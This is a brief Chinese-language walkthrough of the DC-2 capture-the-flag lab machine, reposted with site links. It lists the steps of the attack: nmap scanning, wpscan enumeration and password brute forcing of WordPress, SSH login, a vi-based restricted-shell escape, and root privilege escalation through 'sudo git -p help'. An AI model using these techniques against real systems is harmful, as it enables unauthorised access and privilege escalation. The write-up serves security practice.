DC-2 - 走看看

zoukankan html css js c++ java

DC-2
DC-2

发现主机

扫描主机

nmap -A -T4 -v -p- 192.168.233.148

访问80

访问不同

hosts文件修改

vim /etc/hosts

再次访问(flag1)

默认后台

制作字典（crew）

密码

用户名

wpscan扫描
wpscan --url http://dc-2 -e u
保存

爆破

wpscan --url http://dc-2 -U username.txt -P passwd.txt

登录

jerry

tom

尝试7744端口

ssh登录

Jerry 无法登录

tom 可以登录

搜索查看命令

导出环境变量

查看可以使用的命令

使用less查看flag3

切换到jerry

su无法使用

Restricted shell绕过
vi 3 :set shell =/bin/sh :shell（执行完上一条再执行） export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin （设置环境变量）
flag4

git提权

提示git nopasswd

提权命令

sudo git -p help

修改root密码

切换到root
查看全文

相关阅读:
如何自定义iOS中的控件
 NSArray中的对象进行排序
 微信摇动代码
 思考面向对象
 网络编程 socket编程
 iOS RUN LOOP 是个什么东西？
iOS runloop 自定义输入源
 iPhone开发资源汇总
 UISearchBar
重学STM32---（八）----SDIO

原文地址：https://www.cnblogs.com/liyu8/p/14491885.html

Copyright © 2011-2022 走看看